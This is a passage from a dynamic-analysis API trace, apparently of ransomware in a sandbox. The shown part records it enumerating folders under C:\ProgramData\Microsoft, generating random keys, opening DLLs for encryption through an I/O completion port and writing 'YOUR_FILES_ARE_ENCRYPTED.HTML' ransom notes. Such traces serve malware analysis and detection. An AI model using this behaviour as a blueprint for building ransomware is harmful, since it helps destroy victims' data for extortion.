hHeap=0x600000) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Server", cAlternateFileName="")) returned 0 [0106.343] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0106.343] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0106.343] GetProcessHeap () returned 0x600000 [0106.343] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.344] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\drm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.344] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.345] CloseHandle (hObject=0x308) returned 1 [0106.345] GetProcessHeap () returned 0x600000 [0106.346] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.346] GetProcessHeap () returned 0x600000 [0106.346] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.346] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0106.346] StrStrIW (lpFirst="IdentityCRL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.346] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned 40 [0106.347] GetProcessHeap () returned 0x600000 [0106.347] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.347] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL" [0106.348] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*" [0106.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.348] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.348] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="INT", cAlternateFileName="")) returned 1 [0106.348] StrStrIW (lpFirst="INT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.348] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT") returned 44 [0106.348] GetProcessHeap () returned 0x600000 [0106.348] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.351] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT" [0106.351] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\*" [0106.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0106.351] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.351] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ed8, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0106.351] StrStrIW (lpFirst="ppcrlconfig600.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.351] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll") returned 63 [0106.351] PathFindExtensionW (pszPath="ppcrlconfig600.dll") returned=".dll" [0106.351] lstrlenW (lpString=".dll") returned 4 [0106.351] PathFindExtensionW (pszPath="ppcrlconfig600.dll") returned=".dll" [0106.351] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.351] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0106.352] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=24280) returned 1 [0106.352] GetProcessHeap () returned 0x600000 [0106.352] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0106.355] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="9B") returned 2 [0106.355] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="76") returned 2 [0106.355] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="D5") returned 2 [0106.355] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="1A") returned 2 [0106.355] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="5E") returned 2 [0106.355] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="28") returned 2 [0106.355] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="6A") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="B1") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="63") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="F5") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="A2") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="41") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="F6") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="43") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="DF") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="D3") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="EF") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="B2") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="A3") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="87") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="F1") returned 2 [0106.355] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="72") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="8D") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="50") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="E8") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="71") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="58") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="CA") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="69") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="CF") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="17") returned 2 [0106.356] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="67") returned 2 [0106.357] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll" [0106.357] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.357] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0106.357] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ed8, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 0 [0106.357] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0106.357] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0106.357] GetProcessHeap () returned 0x600000 [0106.357] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.358] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\identitycrl\\int\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.358] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.359] CloseHandle (hObject=0x314) returned 1 [0106.360] GetProcessHeap () returned 0x600000 [0106.360] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.360] GetProcessHeap () returned 0x600000 [0106.360] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.366] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="production", cAlternateFileName="PRODUC~1")) returned 1 [0106.366] StrStrIW (lpFirst="production", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.366] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production") returned 51 [0106.366] GetProcessHeap () returned 0x600000 [0106.366] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.371] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production" [0106.371] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\*" [0106.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.371] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xd40f86df, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x86c0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0106.372] StrStrIW (lpFirst="ppcrlconfig600.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.372] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll") returned 70 [0106.372] PathFindExtensionW (pszPath="ppcrlconfig600.dll") returned=".dll" [0106.372] lstrlenW (lpString=".dll") returned 4 [0106.372] PathFindExtensionW (pszPath="ppcrlconfig600.dll") returned=".dll" [0106.372] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.372] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0106.372] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=34496) returned 1 [0106.373] GetProcessHeap () returned 0x600000 [0106.373] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0106.376] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="CD") returned 2 [0106.376] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="14") returned 2 [0106.376] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="C1") returned 2 [0106.376] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="23") returned 2 [0106.376] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="84") returned 2 [0106.376] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="A0") returned 2 [0106.376] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="F2") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="7F") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="AD") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="30") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="CC") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="EA") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="50") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="BA") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="44") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="6F") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F3") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="B2") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="76") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="00") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="79") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="07") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="63") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="87") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="E2") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="A1") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="D2") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="1F") returned 2 [0106.376] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="68") returned 2 [0106.377] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="B7") returned 2 [0106.377] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="29") returned 2 [0106.377] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="00") returned 2 [0106.377] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll" [0106.377] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.378] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="temp", cAlternateFileName="")) returned 1 [0106.378] StrStrIW (lpFirst="temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.378] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp") returned 56 [0106.378] GetProcessHeap () returned 0x600000 [0106.379] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0106.386] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp" [0106.387] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\*" [0106.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x226c546, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0106.387] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x226c546, cFileName="..", cAlternateFileName="")) returned 1 [0106.387] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x226c546, cFileName="..", cAlternateFileName="")) returned 0 [0106.387] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0106.387] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0106.388] GetProcessHeap () returned 0x600000 [0106.388] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0106.388] CreateFileW 